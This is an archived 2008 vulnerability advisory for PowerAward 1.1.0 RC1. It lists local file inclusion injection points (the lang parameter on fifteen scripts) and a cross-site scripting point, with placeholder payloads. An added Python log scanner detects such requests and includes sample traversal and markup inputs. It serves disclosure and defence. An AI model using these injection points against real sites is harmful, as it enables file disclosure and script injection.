poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting
Author: CraCkEr
type: webapps
platform: php
port:
date_added: 2008-06-27
date_updated: 2016-12-09
verified: 1
codes: OSVDB-50168;CVE-2008-5204;OSVDB-50167;CVE-2008-5203;OSVDB-50166;OSVDB-50165;OSVDB-50164;OSVDB-50163;OSVDB-50162;OSVDB-50161;OSVDB-50160;OSVDB-50159;OSVDB-50158;OSVDB-50157;OSVDB-50156;OSVDB-50155;OSVDB-50154;OSVDB-50151
tags:
aliases:
screenshot_url:
application_url:
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....

[ Local File Include ] [XSS]

Author   : CraCkEr
Group    : uNiTeD CraCkiNg ForCE
Script   : PowerAward 1.1.0 RC1
Download : SourceForge.net
Method   : GET
Critical : High
Impact   : System access
Register Globals : [x] ON  [ ] OFF

DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.

Exploit URL's
[LFI]
http://localhost/path/agb.php?lang=[LFI]
http://localhost/path/angemeldet.php?lang=[LFI]
http://localhost/path/anmelden.php?lang=[LFI]
http://localhost/path/charts.php?lang=[LFI]
http://localhost/path/external_vote.php?lang=[LFI]
http://localhost/path/guestbook.php?lang=[LFI]
http://localhost/path/impressum.php?lang=[LFI]
http://localhost/path/index.php?lang=[LFI]
http://localhost/path/rss-reader.php?lang=[LFI]
http://localhost/path/statistic.php?lang=[LFI]
http://localhost/path/teilnehmer.php?lang=[LFI]
http://localhost/path/topsites.php?lang=[LFI]
http://localhost/path/votecode.php?lang=[LFI]
http://localhost/path/voting.php?lang=[LFI]
http://localhost/path/winner.php?lang=[LFI]
[XSS]
http://localhost/path/external_vote.php?l_vote_done=[XSS]
Notes: More files are infected!!
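
A log check for the two parameters listed above, as an added example that is not part of the original advisory or of PowerAward: it flags requests to any PHP script whose lang value is not a plain language token or whose l_vote_done value carries markup characters. The log format (Apache combined), the shape of a legitimate lang value, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate `lang` values are short language tokens ("de", "en_US").
SAFE_LANG = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,4})?")
# Characters that should not appear in a plain-text message parameter.
MARKUP = re.compile(r"[<>\"'`]")
# Apache/nginx "combined" log format: client, method, request target, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def inspect_request(target):
    """Return (finding, decoded_value) pairs for one request target."""
    parts = urlsplit(target)
    # The advisory notes more files are affected, so key on the parameter
    # name for any PHP script rather than on the listed file names.
    if not parts.path.lower().endswith(".php"):
        return []
    findings = []
    # parse_qs percent-decodes once, so encoded separators show in clear.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("lang", []):
        if not SAFE_LANG.fullmatch(value):
            findings.append(("lang-not-a-language-token", value))
    for value in params.get("l_vote_done", []):
        if MARKUP.search(value):
            findings.append(("l_vote_done-contains-markup", value))
    return findings

def scan(lines):
    """Yield (client, path, finding, value) for each suspicious log line."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        client, target = m.group(1), m.group(3)
        for finding, value in inspect_request(target):
            yield client, urlsplit(target).path, finding, value

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jun/2008:10:00:01 +0000] "GET /path/index.php?lang=de HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Jun/2008:10:00:07 +0000] "GET /path/charts.php?lang=..%2F..%2Fsome%2Ffile HTTP/1.1" 200 812',
    '192.0.2.44 - - [28/Jun/2008:10:00:09 +0000] "GET /path/external_vote.php?l_vote_done=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 640',
    '192.0.2.10 - - [28/Jun/2008:10:00:12 +0000] "GET /path/style.css?lang=de HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the lang check is an allowlist, values that are still encoded after one decoding pass or that carry a trailing NUL byte are flagged as well.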
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
© CraCkEr 2008
# milw0rm.com [2008-06-28]